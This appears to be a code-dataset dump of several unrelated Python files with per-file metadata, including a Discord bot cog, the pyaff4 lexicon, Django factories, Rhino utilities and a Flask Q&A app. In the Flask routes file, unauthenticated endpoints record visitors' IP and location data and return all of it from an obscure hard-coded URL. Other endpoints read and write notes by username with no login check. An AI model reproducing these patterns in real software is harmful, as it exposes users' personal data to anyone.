def initialize(self):
"""Initialize instance attributes.
This will be called after the constructor is called or an entity is created from an existing backend entity.
"""
@property
def id(self):
"""Return the id for this entity.
This identifier is guaranteed to be unique amongst entities of the same type for a single backend instance.
:return: the entity's id
"""
# pylint: disable=redefined-builtin, invalid-name
return self._backend_entity.id
@property
def pk(self):
"""Return the primary key for this entity.
This identifier is guaranteed to be unique amongst entities of the same type for a single backend instance.
:return: the entity's principal key
"""
return self.id
@property
def uuid(self):
"""Return the UUID for this entity.
This identifier is unique across all entities types and backend instances.
:return: the entity uuid
:rtype: :class:`uuid.UUID`
"""
return self._backend_entity.uuid
def store(self):
"""Store the entity."""
self._backend_entity.store()
return self
@property
def is_stored(self):
"""Return whether the entity is stored.
:return: boolean, True if stored, False otherwise
:rtype: bool
"""
return self._backend_entity.is_stored
@property
def backend(self):
"""
Get the backend for this entity
:return: the backend instance
"""
return self._backend_entity.backend
@property
def backend_entity(self):
"""
Get the implementing class for this object
:return: the class model
"""
return self._backend_entity
| 32.431973
| 116
| 0.627687
| 8,347
| 0.875406
| 0
| 0
| 3,981
| 0.417514
| 0
| 0
| 5,676
| 0.595281
|
65ae685c4283988c38775f88a233b7c8ac475f6e
| 2,088
|
py
|
Python
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 5
|
2020-08-12T00:30:03.000Z
|
2020-08-24T08:24:34.000Z
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 3
|
2020-08-12T19:25:00.000Z
|
2020-08-28T00:23:18.000Z
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 8
|
2020-08-12T00:37:03.000Z
|
2020-08-20T19:49:32.000Z
|
from discord.ext import commands
import asyncio
import time
class AntiSelfDeprecation(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.bot.nono_words = []
self.dumb = ('im dumb', 'i\'m dumb', 'im stupid', 'i\'m stupid')
self.not_dumb = ('im not dumb', 'i\'m not dumb', 'i\'m not stupid', 'im not stupid')
self.bot.deny = ['shut', 'shut up', 'up shut']
@commands.Cog.listener()
async def on_message(self, message):
if message.content.lower() in self.bot.nono_words:
await message.channel.send("You're a good person and can't change my mind smh")
elif message.content.lower().startswith(self.dumb):
await message.channel.send('You\'re not dumb, you\'re learning')
try:
m = await self.bot.wait_for('message', check=lambda msg: msg.author.id == message.author.id and msg.channel == message.channel and msg.content.lower() in self.bot.deny, timeout=10.0)
await m.channel.send('no u')
except asyncio.TimeoutError:
return
elif message.content.lower().startswith(self.not_dumb):
await message.channel.send('Correct.')
@commands.Cog.listener()
async def on_message(self, message):
if message.content.lower() == 'yoshi man good':
await message.add_reaction('\U0001F49A')
# bump timer, waits 2 hours and 30 minutes
@commands.Cog.listener()
async def on_message(self, message):
if message.author.id == 302050872383242240 and len(message.embeds) > 0 and 'Bump done' in message.embeds[0].description:
bumped = time.monotonic()
self.last_bumped = bumped
await message.add_reaction('👍')
await asyncio.sleep(7200)
if self.last_bumped == bumped:
await message.channel.send('<a:filterfeed:693001359934357563> No one\'s bumped our server in over two hours! Disboard keeps us up on the front page! Use `/bump` to bump us!')
def setup(bot):
bot.add_cog(AntiSelfDeprecation(bot))
| 43.5
| 198
| 0.632184
| 1,967
| 0.940698
| 0
| 0
| 1,556
| 0.744142
| 1,469
| 0.702535
| 473
| 0.226208
|
65aee5c9340fded7e6ab5b1f35346dad94ab5fed
| 10,809
|
py
|
Python
|
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""The AFF4 lexicon."""
from __future__ import unicode_literals
# This is the version of the AFF4 specification we support - not the library
# version itself.
from builtins import object
import rdflib
from pyaff4 import rdfvalue
AFF4_VERSION = "0.2"
AFF4_MAX_READ_LEN = 1024*1024*100
AFF4_NAMESPACE = "http://aff4.org/Schema#"
AFF4_LEGACY_NAMESPACE = "http://afflib.org/2009/aff4#"
XSD_NAMESPACE = "http://www.w3.org/2001/XMLSchema#"
RDF_NAMESPACE = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
AFF4_MEMORY_NAMESPACE = "http://aff4.org/Schema#memory/"
AFF4_DISK_NAMESPACE = "http://aff4.org/Schema#disk/"
AFF4_MACOS_NAMESPACE = "http://aff4.org/Schema#macos/"
# Attributes in this namespace will never be written to persistant
# storage. They are simply used as a way for storing metadata about an AFF4
# object internally.
AFF4_VOLATILE_NAMESPACE = "http://aff4.org/VolatileSchema#"
# The configuration space of the library itself. All these should be volatile
# and therefore not persistant or interoperable with other AFF4 implementations.
AFF4_CONFIG_NAMESPACE = AFF4_NAMESPACE + "config"
# Location of the cache (contains AFF4_FILE_NAME)
AFF4_CONFIG_CACHE_DIR = AFF4_CONFIG_NAMESPACE + "/cache"
# Commonly used RDF types.
URNType = "URN"
XSDStringType = (XSD_NAMESPACE + "string")
RDFBytesType = (XSD_NAMESPACE + "hexBinary")
XSDIntegerType = (XSD_NAMESPACE + "integer")
XSDIntegerTypeInt = (XSD_NAMESPACE + "int")
XSDIntegerTypeLong = (XSD_NAMESPACE + "long")
XSDBooleanType = (XSD_NAMESPACE + "boolean")
# Attribute names for different AFF4 objects.
# Base AFF4Object
AFF4_TYPE = (RDF_NAMESPACE + "type")
AFF4_STORED = (AFF4_NAMESPACE + "stored")
AFF4_CONTAINS = (AFF4_NAMESPACE + "contains")
# Each container should have this file which contains the URN of the container.
AFF4_CONTAINER_DESCRIPTION = "container.description"
AFF4_CONTAINER_INFO_TURTLE = "information.turtle"
AFF4_CONTAINER_INFO_YAML = "information.yaml"
# AFF4 ZipFile containers.
AFF4_ZIP_TYPE = (AFF4_NAMESPACE + "zip_volume")
# AFF4Stream
AFF4_STREAM_SIZE = (AFF4_NAMESPACE + "size")
AFF4_LEGACY_STREAM_SIZE = (AFF4_LEGACY_NAMESPACE + "size")
# The original filename the stream had.
AFF4_STREAM_ORIGINAL_FILENAME = (AFF4_NAMESPACE + "original_filename")
# Can be "read", "truncate", "append"
AFF4_STREAM_WRITE_MODE = (AFF4_VOLATILE_NAMESPACE + "writable")
# FileBackedObjects are either marked explicitly or using the file:// scheme.
AFF4_FILE_TYPE = (AFF4_NAMESPACE + "file")
# file:// based URNs do not always have a direct mapping to filesystem
# paths. This volatile attribute is used to control the filename mapping.
AFF4_FILE_NAME = (AFF4_VOLATILE_NAMESPACE + "filename")
# The original filename the stream had.
AFF4_STREAM_ORIGINAL_FILENAME = (AFF4_NAMESPACE + "original_filename")
# ZipFileSegment
AFF4_ZIP_SEGMENT_TYPE = (AFF4_NAMESPACE + "zip_segment")
# ZipStoredLogicalStream
AFF4_ZIP_SEGMENT_IMAGE_TYPE = (AFF4_NAMESPACE + "ZipSegment")
AFF4_FILEIMAGE = (AFF4_NAMESPACE + "FileImage")
# AFF4 Image Stream - stores a stream using Bevies.
AFF4_IMAGE_TYPE = (AFF4_NAMESPACE + "ImageStream")
AFF4_LEGACY_IMAGE_TYPE = (AFF4_LEGACY_NAMESPACE + "stream")
AFF4_SCUDETTE_IMAGE_TYPE = (AFF4_NAMESPACE + "image")
AFF4_IMAGE_CHUNK_SIZE = (AFF4_NAMESPACE + "chunkSize")
AFF4_LEGACY_IMAGE_CHUNK_SIZE = (AFF4_LEGACY_NAMESPACE + "chunkSize")
AFF4_IMAGE_CHUNKS_PER_SEGMENT = (AFF4_NAMESPACE + "chunksInSegment")
AFF4_LEGACY_IMAGE_CHUNKS_PER_SEGMENT = (AFF4_LEGACY_NAMESPACE + "chunksInSegment")
AFF4_IMAGE_COMPRESSION = (AFF4_NAMESPACE + "compressionMethod")
AFF4_LEGACY_IMAGE_COMPRESSION = (AFF4_LEGACY_NAMESPACE + "CompressionMethod")
AFF4_IMAGE_COMPRESSION_ZLIB = "https://www.ietf.org/rfc/rfc1950.txt"
AFF4_IMAGE_COMPRESSION_SNAPPY = "http://code.google.com/p/snappy/"
AFF4_IMAGE_COMPRESSION_SNAPPY_SCUDETTE = "https://github.com/google/snappy"
AFF4_IMAGE_COMPRESSION_STORED = (AFF4_NAMESPACE + "compression/stored")
AFF4_IMAGE_AES_XTS = "https://doi.org/10.1109/IEEESTD.2008.4493450"
# AFF4Map - stores a mapping from one stream to another.
AFF4_MAP_TYPE = (AFF4_NAMESPACE + "Map")
AFF4_LEGACY_MAP_TYPE = (AFF4_LEGACY_NAMESPACE + "map")
AFF4_SCUDETTE_MAP_TYPE = (AFF4_NAMESPACE + "map")
# Encrypted Streams
AFF4_ENCRYPTEDSTREAM_TYPE = (AFF4_NAMESPACE + "EncryptedStream")
AFF4_RANDOMSTREAM_TYPE = (AFF4_NAMESPACE + "RandomAccessImageStream")
AFF4_KEYBAG = (AFF4_NAMESPACE + "keyBag")
AFF4_WRAPPEDKEY = (AFF4_NAMESPACE + "wrappedKey")
AFF4_SALT = (AFF4_NAMESPACE + "salt")
AFF4_ITERATIONS = (AFF4_NAMESPACE + "iterations")
AFF4_KEYSIZEBYTES = (AFF4_NAMESPACE + "keySizeInBytes")
AFF4_CERT_ENCRYPTED_KEYBAG = (AFF4_NAMESPACE + "PublicKeyEncryptedKeyBag")
AFF4_PASSWORD_WRAPPED_KEYBAG = (AFF4_NAMESPACE + "PasswordWrappedKeyBag")
AFF4_SERIALNUMBER = (AFF4_NAMESPACE + "serialNumber")
AFF4_SUBJECTNAME = (AFF4_NAMESPACE + "x509SubjectName")
# Categories describe the general type of an image.
AFF4_CATEGORY = (AFF4_NAMESPACE + "category")
# These represent standard attributes to describe memory forensics images.
AFF4_MEMORY_PHYSICAL = (AFF4_MEMORY_NAMESPACE + "physical")
AFF4_MEMORY_VIRTUAL = (AFF4_MEMORY_NAMESPACE + "virtual")
AFF4_MEMORY_PAGEFILE = (AFF4_MEMORY_NAMESPACE + "pagefile")
AFF4_MEMORY_PAGEFILE_NUM = (AFF4_MEMORY_NAMESPACE + "pagefile_number")
AFF4_DISK_RAW = (AFF4_DISK_NAMESPACE + "raw")
AFF4_DISK_PARTITION = (AFF4_DISK_NAMESPACE + "partition")
AFF4_DIRECTORY_TYPE = (AFF4_NAMESPACE + "directory")
#The constant stream is a psuedo stream which just returns a constant.
AFF4_CONSTANT_TYPE = (AFF4_NAMESPACE + "constant")
# The constant to repeat (default 0).
AFF4_CONSTANT_CHAR = (AFF4_NAMESPACE + "constant_char")
# An AFF4 Directory stores all members as files on the filesystem. Some
# filesystems can not represent the URNs properly, hence we need a mapping
# between the URN and the filename. This attribute stores the _relative_ path
# of the filename for the member URN relative to the container's path.
AFF4_DIRECTORY_CHILD_FILENAME = (AFF4_NAMESPACE + "directory/filename")
HASH_SHA512 = rdflib.URIRef("http://aff4.org/Schema#SHA512")
HASH_SHA256 = rdflib.URIRef("http://aff4.org/Schema#SHA256")
HASH_SHA1 = rdflib.URIRef("http://aff4.org/Schema#SHA1")
HASH_MD5 = rdflib.URIRef("http://aff4.org/Schema#MD5")
HASH_BLAKE2B = rdflib.URIRef("http://aff4.org/Schema#Blake2b")
HASH_BLOCKMAPHASH_SHA512 = rdflib.URIRef("http://aff4.org/Schema#blockMapHashSHA512")
class Lexicon(object):
def __init__(self):
pass
def of(self, end):
return self.base + end
class StdLexicon(Lexicon):
base = AFF4_NAMESPACE
map = base + "Map"
Image = base + "Image"
stored = base + "stored"
target = base + "target"
contains = base + "contains"
dataStream = base + "dataStream"
blockMapHash = base + "blockMapHash"
dependentStream = base + "dependentStream"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
blockHashesHash = base + "blockHashesHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunksInSegment"
chunkSize = base + "chunkSize"
streamSize = base + "size"
compressionMethod = base + "compressionMethod"
memoryPageTableEntryOffset = base + "memoryPageTableEntryOffset"
ntKernelBase = base + "NTKernelBase"
OSXKernelPhysicalOffset = base + "OSXKernelPhysicalOffset"
OSXKALSRSlide = base + "OSXKALSRSlide"
OSXDTBPhysicalOffset = base + "OSXDTBPhysicalOffset"
class Std11Lexicon(StdLexicon):
base = AFF4_NAMESPACE
FileImage = base + "FileImage"
FolderImage = base + "Folder"
lastWritten = base+ "lastWritten"
lastAccessed = base + "lastAccessed"
recordChanged = base + "recordChanged"
birthTime = base + "birthTime"
pathName = base + "originalFileName"
collidingDataStream = base + "collidingDataStream"
child = base + "child"
LogicalAcquisitionTask = base + "LogicalAcquisitionTask"
filesystemRoot = base + "filesystemRoot"
keyBag = AFF4_KEYBAG
salt = AFF4_SALT
iterations = AFF4_ITERATIONS
keySizeInBytes = AFF4_KEYSIZEBYTES
wrappedKey = AFF4_WRAPPEDKEY
EncryptedStream = AFF4_ENCRYPTEDSTREAM_TYPE
CertEncryptedKeyBag = AFF4_CERT_ENCRYPTED_KEYBAG
PasswordWrappedKeyBag = AFF4_PASSWORD_WRAPPED_KEYBAG
serialNumber = AFF4_SERIALNUMBER
subjectName = AFF4_SUBJECTNAME
class LegacyLexicon(Lexicon):
base = AFF4_LEGACY_NAMESPACE
map = base + "map"
stored = base + "stored"
Image = base + "Image"
blockHashesHash = base + "blockHashesHash"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunksInSegment"
chunkSize = base + "chunkSize"
streamSize = base + "size"
compressionMethod = base + "CompressionMethod"
class ScudetteLexicon(Lexicon):
base = AFF4_NAMESPACE
map = base + "map"
stored = base + "stored"
Image = base + "Image"
blockHashesHash = base + "blockHashesHash"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunks_per_segment"
chunkSize = base + "chunk_size"
streamSize = base + "size"
compressionMethod = base + "compression"
category = base + "category"
memoryPhysical = "http://aff4.org/Schema#memory/physical"
# early logical imaging support for pmem
class PmemLogicalPreStd(StdLexicon):
pathName = (AFF4_NAMESPACE + "original_filename")
legacy = LegacyLexicon()
standard = StdLexicon()
scudette = ScudetteLexicon()
standard11 = Std11Lexicon()
pmemlogical = PmemLogicalPreStd()
def AutoResolveAttribute(resolver, urn, attribute):
"""Iterate over all lexicons to autodetect the attribute."""
for lexicon in (standard, scudette, legacy):
result = resolver.Get(urn, getattr(lexicon, attribute))
if result is not None:
return result
transient_graph = rdfvalue.URN("http://aff4.org/Schema#transient")
any = rdfvalue.URN("http://aff4.org/Schema#any")
| 38.603571
| 85
| 0.753261
| 3,217
| 0.297622
| 0
| 0
| 0
| 0
| 0
| 0
| 4,629
| 0.428254
|
65af59058300b104393557367f8057f6940196d0
| 431
|
py
|
Python
|
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | 1
|
2021-03-20T07:43:33.000Z
|
2021-03-20T07:43:33.000Z
|
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | null | null | null |
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | null | null | null |
import queue
import threading
from subprocess import PIPE, Popen
procs = []
stdout = queue.Queue()
def process_stdout(proc):
while (line := proc.stdout.readline()) != b"":
stdout.put(line.decode().strip())
procs.remove(proc)
def create_proc(uri):
proc = Popen(["unbuffer", "xdg-open", uri], stdout=PIPE, stderr=PIPE)
procs.append(proc)
threading.Thread(target=lambda: process_stdout(proc)).start()
| 22.684211
| 73
| 0.679814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.053364
|
65afb03352fe6b2c1a60ffb0e33ef381c9954df6
| 1,834
|
py
|
Python
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 15
|
2018-09-27T07:36:30.000Z
|
2021-08-03T16:01:21.000Z
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 183
|
2017-11-16T23:30:47.000Z
|
2020-12-18T21:43:36.000Z
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 12
|
2017-12-12T22:48:05.000Z
|
2021-03-01T18:01:24.000Z
|
import factory
from pages.official_documents_page.models import OfficialDocumentPage, OfficialDocumentCollectionOfficialDocumentPage
from pages.base_page.factories import JanisBasePageFactory
from pages.official_documents_collection.factories import OfficialDocumentCollectionFactory
from wagtail.documents.models import Document
class DocumentFactory(factory.DjangoModelFactory):
@classmethod
def create(cls, *args, **kwargs):
return super(DocumentFactory, cls).create(*args, **kwargs)
class Meta:
model = Document
class OfficialDocumentCollectionDocumentFactory(factory.django.DjangoModelFactory):
page = factory.SubFactory(
'official_documents_page.factories.OfficialDocumentPageFactory',
add_departments__dummy=False,
)
official_document_collection = factory.SubFactory(
OfficialDocumentCollectionFactory,
add_departments__dummy=False,
)
class Meta:
model = OfficialDocumentCollectionOfficialDocumentPage
class OfficialDocumentPageFactory(JanisBasePageFactory):
class Meta:
model = OfficialDocumentPage
# document = factory.SubFactory(
# DocumentFactory
# )
@factory.post_generation
def add_official_document_collection(self, create, extracted, **kwargs):
if extracted:
# A list of official document collections were passed in, use them
for collection in extracted['official_document_collection']:
OfficialDocumentCollectionDocumentFactory.create(page=self, official_document_collection=collection)
return
# pass "add_topics__dummy"=True into Factory() to make dummy document collections
if create:
if kwargs.get("dummy", False):
OfficialDocumentCollectionFactory.create_batch(2, page=self)
| 35.960784
| 117
| 0.745911
| 1,495
| 0.815158
| 0
| 0
| 758
| 0.413304
| 0
| 0
| 303
| 0.165213
|
65b0c43d10ec56796ba655b95a3c9d479381e676
| 6,927
|
py
|
Python
|
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
from flask import Blueprint, render_template, request, redirect, url_for
from flask_login import current_user, login_required
from flask_cors import CORS
from flask_qa.extensions import db
from flask_qa.models import Question, User, Stats, Notes
import json
main = Blueprint('main', __name__)
@main.route('/')
def index():
questions = Question.query.filter(Question.answer != None).all()
context = {
'questions' : questions
}
return render_template('home.html', **context)
@main.route('/ask', methods=['GET', 'POST'])
@login_required
def ask():
if request.method == 'POST':
question = request.form['question']
expert = request.form['expert']
question = Question(
question=question,
expert_id=expert,
asked_by_id=current_user.id
)
db.session.add(question)
db.session.commit()
return redirect(url_for('main.index'))
experts = User.query.filter_by(expert=True).all()
context = {
'experts' : experts
}
return render_template('ask.html', **context)
@main.route('/api', methods=['POST'])
def apiToPostStats():
if request.method == 'POST':
ip = request.form["ip"]
loc = request.form["loc"]
city = request.form["city"]
country = request.form["country"]
org = request.form["org"]
postal = request.form["postal"]
region = request.form["region"]
timezone = request.form["timezone"]
time = request.form["time"]
stats = Stats(
ip = ip,
loc = loc,
city = city,
country = country,
org = org,
postal = postal,
region = region,
timezone = timezone,
time = time
)
db.session.add(stats)
db.session.commit()
return "okay", 200
return render_template('ask.html', **context)
@main.route('/api/postNotes', methods=['POST', 'GET'])
def apiToPostNotes():
if request.method == 'POST':
# id = request.form["id"]
userName = request.form["username"]
notesEntry = request.form["notes"]
notesRow = Notes.query.filter_by(username=userName).first()
if not notesRow:
notes=Notes(
notes=notesEntry,
username=userName
)
db.session.add(notes)
db.session.commit()
else:
idRow=notesRow.id
notesRow.notes = notesEntry
db.session.commit()
# if not notesRow:
# notes = Notes(
# notes = notesEntry,
# username = username
# )
# db.session.add(notes)
# db.session.commit()
# else:
# id = notesRow.id
# notes = Notes(
# id=id;
# notes = notesEntry,
# username = username
# )
# db.session.add(notes)
# db.session.commit()
return "okay", 200
return render_template('ask.html', **context)
@main.route('/api/getNotes/<userName>', methods=['GET'])
def apiToGetNotes(userName):
if request.method == 'GET':
notes = Notes.query.filter_by(username=userName).first()
if not notes:
newNotes = Notes(
notes = '[]',
username=userName
)
db.session.add(newNotes)
db.session.commit()
return json.dumps(newNotes.notes), 200
return json.dumps(notes.notes), 200
return 'hi',200
@main.route('/api/coord', methods=['GET'])
def apiToGetCoords():
if request.method == 'GET':
stats = Stats.query.filter().all()
coords = []
for stat in stats:
coordinate = []
first = float(stat.loc.split(',')[0])
second = float(stat.loc.split(',')[1])
coordinate.append(second)
coordinate.append(first)
coords.append(coordinate)
return json.dumps(coords), 200
return 'hi',200
@main.route('/api/get-records/awersgfjkweshjbs', methods=['GET'])
def apiToGetStats():
if request.method == 'GET':
stats = Stats.query.filter().all()
coords = []
for stat in stats:
row1= []
row1.append(stat.ip)
row1.append(stat.loc)
row1.append(stat.city)
row1.append(stat.country)
row1.append(stat.org)
row1.append(stat.postal)
row1.append(stat.region)
row1.append(stat.timezone)
row1.append(stat.time)
# row=stat.ip+','+stat.loc+','+stat.city+','+stat.country+','+stat.org+','+stat.postal+','+stat.region+','+stat.timezone+','+stat.time
coords.append(row1)
return json.dumps(coords), 200
return 'hi',200
@main.route('/answer/<int:question_id>', methods=['GET', 'POST'])
@login_required
def answer(question_id):
if not current_user.expert:
return redirect(url_for('main.index'))
question = Question.query.get_or_404(question_id)
if request.method == 'POST':
question.answer = request.form['answer']
db.session.commit()
return redirect(url_for('main.unanswered'))
context = {
'question' : question
}
return render_template('answer.html', **context)
@main.route('/question/<int:question_id>')
def question(question_id):
question = Question.query.get_or_404(question_id)
context = {
'question' : question
}
return render_template('question.html', **context)
@main.route('/unanswered')
@login_required
def unanswered():
if not current_user.expert:
return redirect(url_for('main.index'))
unanswered_questions = Question.query\
.filter_by(expert_id=current_user.id)\
.filter(Question.answer == None)\
.all()
context = {
'unanswered_questions' : unanswered_questions
}
return render_template('unanswered.html', **context)
@main.route('/users')
@login_required
def users():
if not current_user.admin:
return redirect(url_for('main.index'))
users = User.query.filter_by(admin=False).all()
context = {
'users' : users
}
return render_template('users.html', **context)
@main.route('/promote/<int:user_id>')
@login_required
def promote(user_id):
if not current_user.admin:
return redirect(url_for('main.index'))
user = User.query.get_or_404(user_id)
user.expert = True
db.session.commit()
return redirect(url_for('main.users'))
| 27.379447
| 147
| 0.549877
| 0
| 0
| 0
| 0
| 6,579
| 0.949762
| 0
| 0
| 1,212
| 0.174968
|
65b1a21d6fc172f7d80c2944e861d993aee45a5a
| 7,453
|
py
|
Python
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import os
import sys
import ast
from compas_rhino.forms import TextForm
from compas_rhino.forms import ImageForm
import System
import rhinoscriptsyntax as rs
import Rhino
import clr
clr.AddReference('Rhino.UI')
import Rhino.UI # noqa: E402
from Rhino.UI.Dialogs import ShowMessageBox # noqa: E402
try:
from compas_rhino.forms import PropertyListForm
except ImportError:
from Rhino.UI.Dialogs import ShowPropertyListBox
__all__ = [
'wait',
'get_tolerance',
'toggle_toolbargroup',
'pick_point',
'browse_for_folder',
'browse_for_file',
'print_display_on',
'display_message',
'display_text',
'display_image',
'display_html',
'update_settings',
'update_named_values',
'screenshot_current_view',
'select_folder',
'select_file',
'unload_modules',
]
# ==============================================================================
# Truly miscellaneous :)
# ==============================================================================
def screenshot_current_view(path,
width=1920,
height=1080,
scale=1,
draw_grid=False,
draw_world_axes=False,
draw_cplane_axes=False,
background=False):
"""Take a screenshot of the current view.
Parameters
----------
path : str
The filepath for saving the screenshot.
Other Parameters
----------------
width : int, optional
height : int, optional
scale : float, optional
draw_grid : bool, optional
draw_world_axes : bool, optional
draw_cplane_axes : bool, optional
background : bool, optional
Returns
-------
bool
True if the command was successful.
False otherwise.
"""
properties = [draw_grid, draw_world_axes, draw_cplane_axes, background]
properties = ["Yes" if item else "No" for item in properties]
scale = max(1, scale) # the rhino command requires a scale > 1
rs.EnableRedraw(True)
rs.Sleep(0)
result = rs.Command("-_ViewCaptureToFile \"" + os.path.abspath(path) + "\""
" Width=" + str(width) +
" Height=" + str(height) +
" Scale=" + str(scale) +
" DrawGrid=" + properties[0] +
" DrawWorldAxes=" + properties[1] +
" DrawCPlaneAxes=" + properties[2] +
" TransparentBackground=" + properties[3] +
" _enter", False)
rs.EnableRedraw(False)
return result
def wait():
return Rhino.RhinoApp.Wait()
def get_tolerance():
"""Get the absolute tolerance.
Returns
-------
float
The tolerance.
"""
return rs.UnitAbsoluteTolerance()
def toggle_toolbargroup(rui, group):
if not os.path.exists(rui) or not os.path.isfile(rui):
return
collection = rs.IsToolbarCollection(rui)
if not collection:
collection = rs.OpenToolbarCollection(rui)
if rs.IsToolbar(collection, group, True):
rs.ShowToolbar(collection, group)
else:
if rs.IsToolbar(collection, group, True):
if rs.IsToolbarVisible(collection, group):
rs.HideToolbar(collection, group)
else:
rs.ShowToolbar(collection, group)
def pick_point(message='Pick a point.'):
point = rs.GetPoint(message)
if point:
return list(point)
return None
# ==============================================================================
# File system
# ==============================================================================
def browse_for_folder(message=None, default=None):
return rs.BrowseForFolder(folder=default, message=message, title='compas')
select_folder = browse_for_folder
def browse_for_file(title=None, folder=None, filter=None):
if filter == 'json':
filter = 'JSON files (*.json)|*.json||'
elif filter == 'obj':
filter = 'OBJ files (*.obj)|*.obj||'
elif filter == 'fofin':
filter = 'FOFIN session files (*.fofin)|*.fofin||'
else:
pass
return rs.OpenFileName(title, filter=filter, folder=folder)
select_file = browse_for_file
# ==============================================================================
# Display
# ==============================================================================
def print_display_on(on=True):
if on:
rs.Command('_PrintDisplay State On Color Display Thickness 1 _Enter')
else:
rs.Command('_PrintDisplay State Off _Enter')
def display_message(message):
return ShowMessageBox(message, 'Message')
def display_text(text, title='Text', width=800, height=600):
if isinstance(text, (list, tuple)):
text = '{0}'.format(System.Environment.NewLine).join(text)
form = TextForm(text, title, width, height)
return form.show()
def display_image(image, title='Image', width=800, height=600):
form = ImageForm(image, title, width, height)
return form.show()
def display_html():
raise NotImplementedError
# ==============================================================================
# Settings and attributes
# ==============================================================================
def update_named_values(names, values, message='', title='Update named values', evaluate=False):
try:
dialog = PropertyListForm(names, values)
except Exception:
values = ShowPropertyListBox(message, title, names, values)
else:
if dialog.ShowModal(Rhino.UI.RhinoEtoApp.MainWindow):
values = dialog.values
else:
values = None
if evaluate:
if values:
values = list(values)
for i in range(len(values)):
value = values[i]
try:
value = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
pass
values[i] = value
return values
def update_settings(settings, message='', title='Update settings'):
names = sorted(settings.keys())
values = [str(settings[name]) for name in names]
values = update_named_values(names, values, message=message, title=title)
if values:
values = list(values)
for name, value in zip(names, values):
try:
settings[name] = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
settings[name] = value
return True
return False
def unload_modules(top_level_module_name):
"""Unloads all modules named starting with the specified string.
This function eases the development workflow when editing a library that is
used from Rhino/Grasshopper.
Parameters
----------
top_level_module_name : :obj:`str`
Name of the top-level module to unload.
Returns
-------
list
List of unloaded module names.
"""
modules = filter(lambda m: m.startswith(top_level_module_name), sys.modules)
for module in modules:
sys.modules.pop(module)
return modules
| 27.603704
| 96
| 0.56058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,484
| 0.333289
|
65b235fdfa7ea03f6e55907463fc98d053669de0
| 3,539
|
py
|
Python
|
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | 4
|
